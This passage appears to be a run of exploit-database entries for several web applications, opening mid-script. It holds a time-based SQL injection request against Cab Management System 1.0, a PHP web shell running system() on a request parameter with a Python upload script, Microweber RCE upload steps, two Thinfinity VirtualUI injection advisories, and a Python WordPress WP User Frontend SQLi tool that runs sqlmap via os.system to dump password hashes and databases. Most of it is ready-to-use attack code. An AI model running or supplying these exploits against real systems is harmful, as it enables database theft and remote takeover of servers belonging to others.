exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

# Exploit Title: Cab Management System 1.0 - 'id' SQLi (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html # Version : 1.0 # Tested on: windows 10 xammp | Kali linux # Category: WebApp # Google Dork: N/A # Date: 18.02.2022 ######## Description ######## # # # Authenticate and get update client settings will be appear the # id paramater put your payload at there it'll be work # # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= GET /cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1 Host: localhost sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=m1s7h9jremg0vj7ipk9m05n1nt Connection: close

# Exploit Title: Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated) # Google Dork: NA # Date: 02/17/2022 # Exploit Author: Chetanya Sharma @AggressiveUser # Vendor Homepage: https://microweber.org/ # Software Link: https://github.com/microweber/microweber # Version: 1.2.11 # Tested on: [KALI OS] # CVE : CVE-2022-0557 # Reference : https://huntr.dev/bounties/660c89af-2de5-41bc-aada-9e4e78142db8/ # Step To Reproduce - Login using Admin Creds. - Navigate to User Section then Add/Modify Users - Change/Add image of profile and Select a Crafted Image file - Crafted image file Aka A image file which craft with PHP CODES for execution - File Extension of Crafted File is PHP7 like "Sample.php7" - Path of Uploaded Crafted SHELL https://localhost/userfiles/media/default/shell.php7

# Exploit Title: Cab Management System 1.0 - Remote Code Execution (RCE) (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html # Version : 1.0 # Tested on: windows 10 xammp | Kali linux # Category: WebApp # Google Dork: N/A # Date: 18.02.2022 ######## Description ######## # # # Step 1: Login admin account and go settings of site # Step 2: Update web site icon and selecet a webshell.php # Step3 : Upload your webshell that's it... # ######## Proof of Concept ######## ========>>> START REQUEST <<<========= POST /cms/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost Content-Length: 11338 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98" Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc5vp1oayEolowCbb X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/?page=system_info Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=samlsgsrh4iq50eqc1qldpthml Connection: close <-- SNIPP HERE --> ------WebKitFormBoundaryc5vp1oayEolowCbb Content-Disposition: form-data; name="img"; filename="shell.php" Content-Type: application/octet-stream <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> ------WebKitFormBoundaryc5vp1oayEolowCbb Content-Disposition: form-data; name="cover"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryc5vp1oayEolowCbb-- <-- SNIPP HERE --> ========>>> END REQUEST <<<========= ========>>> EXPLOIT CODE <<<========= import requests print(""" -------------------------------------------- | | | Author: Alperen Ergel (@alpernae) | | | | CAB Management System v1 Exploit | | | -------------------------------------------- """) username = input("Username: ") password = input("Password: ") URL = input("Domain: ") burp0_url = "http://" + URL + "/cms/classes/Login.php?f=login" burp0_headers = {"sec-ch-ua": "\"(Not(A:Brand\";v=\"8\", \"Chromium\";v=\"98\"", "Accept": "*/*", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36", "sec-ch-ua-platform": "\"Windows\"", "Origin": "http://192.168.1.33", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://192.168.1.33/cms/admin/login.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"} burp0_data = {"username": username, "password": password} requests.post(burp0_url, headers=burp0_headers, data=burp0_data) FILE = input("File: ") burp0_url = "http://" + URL + "/cms/classes/SystemSettings.php?f=update_settings" burp0_headers = {"sec-ch-ua": "\"(Not(A:Brand\";v=\"8\", \"Chromium\";v=\"98\"", "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryc5vp1oayEolowCbb", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36", "sec-ch-ua-platform": "\"Windows\"", "Origin": "http://localhost", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://localhost/cms/admin/?page=system_info", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"} burp0_data = "------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nCab Management System\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nCMS - PHP\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"content[welcome]\"\r\n\r\n<ptest</p>\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"content[about]\"\r\n\r\n<ptest</p>\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + FILE + "\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"cover\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb--\r\n" requests.post(burp0_url, headers=burp0_headers, data=burp0_data)

Exploit Title: Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection Date: 16/12/2021 Exploit Author: Daniel Morales Vendor: https://www.cybelesoft.com <https://www.cybelesoft.com/> Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ <https://www.cybelesoft.com/thinfinity/virtualui/> Version: Thinfinity VirtualUI < v3.0 Tested on: Microsoft Windows CVE: CVE-2021-45092 How it works By accessing the following payload (URL) an attacker could iframe any external website (of course, only external endpoints that allows being iframed). Payload The vulnerable vector is "https://example.com/lab.html?vpath=//wikipedia.com <https://example.com/lab.html?vpath=//wikipedia.com> " where "vpath=//" is the pointer to the external site to be iframed. Vulnerable versions It has been tested in VirtualUI version 2.1.37.2, 2.1.42.2, 2.5.0.0, 2.5.36.1, 2.5.36.2 and 2.5.41.0. References https://github.com/cybelesoft/virtualui/issues/2 <https://github.com/cybelesoft/virtualui/issues/2> https://www.tenable.com/cve/CVE-2021-45092 <https://www.tenable.com/cve/CVE-2021-45092> https://twitter.com/danielmofer <https://twitter.com/danielmofer>

Exploit Title: Thinfinity VirtualUI 2.5.26.2 - Information Disclosure Date: 18/01/2022 Exploit Author: Daniel Morales Vendor: https://www.cybelesoft.com <https://www.cybelesoft.com/> Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ <https://www.cybelesoft.com/thinfinity/virtualui/> Version vulnerable: Thinfinity VirtualUI < v2.5.26.2 Tested on: Microsoft Windows CVE: CVE-2021-46354 How it works External service interaction arises when it is possible to induce an application to interact with an arbitrary external service. The ability to send requests to other systems can allow the vulnerable server to filtrate the real IP of the webserver or increase the attack surface (it may be used also to filtrate the real IP behind a CDN). Payload An example of the HTTP request "https://example.com/cmd <https://example.com/cmd>? cmd=connect&wscompression=true&destAddr=domain.com <http://domain.com/> &scraper=fmx&screenWidth=1918&screenHeight=934&fitmode=0&argumentsp=&orientation=0&browserWidth=191 8&browserHeight=872&supportCur=true&id=null&devicePixelRatio=1&isMobile=false&isLandscape=true&supp ortsFullScreen=true&webapp=false” Where "domain.com <http://domain.com/>" is the external endpoint to be requested. Vulnerable versions It has been tested in VirtualUI version 2.1.28.0, 2.1.32.1 and 2.5.26.2 References https://github.com/cybelesoft/virtualui/issues/3 <https://github.com/cybelesoft/virtualui/issues/3> https://www.tenable.com/cve/CVE-2021-46354 <https://www.tenable.com/cve/CVE-2021-46354> https://twitter.com/danielmofer <https://twitter.com/danielmofer>

# Exploit Title: WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated) # Date 20.02.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://wedevs.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-user-frontend.3.5.25.zip # Version: < 3.5.25 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-25076 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-25076/README.md ''' Description: The WP User Frontend WordPress plugin before 3.5.26 does not validate and escape the status parameter before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection. Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting ''' banner = ''' _|_|_| _| _| _|_|_|_| _|_| _| _|_| _| _|_| _|_|_|_| _| _|_|_|_|_| _|_|_| _| _| _| _| _| _| _| _| _| _| _|_| _| _| _| _| _| _| _| _| _| _| _|_|_| _|_|_|_|_| _| _| _| _| _| _|_|_|_|_| _| _|_|_| _| _| _| _|_|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_|_| _| _|_|_|_| _|_|_|_| _| _|_|_|_| _| _|_|_|_| _|_|_| _| _| _|_| [+] WP User Frontend - SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse from datetime import datetime import os import requests import json # User-Input: my_parser = argparse.ArgumentParser(description= 'WP User Frontend - SQL-Injection (Authenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # SQL-Injection (Exploit): # Generate payload for sqlmap cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') cookie = cookie.replace(',', '; ') print('[*] Payload for SQL-Injection:') exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=wpuf_subscribers&post_ID=1&status=1" ' exploitcode_risk = '--level 2 --risk 2 ' exploitcode_cookie = '--cookie="' + cookie + '" ' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p status -v 0 --answers="follow=Y" --batch' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))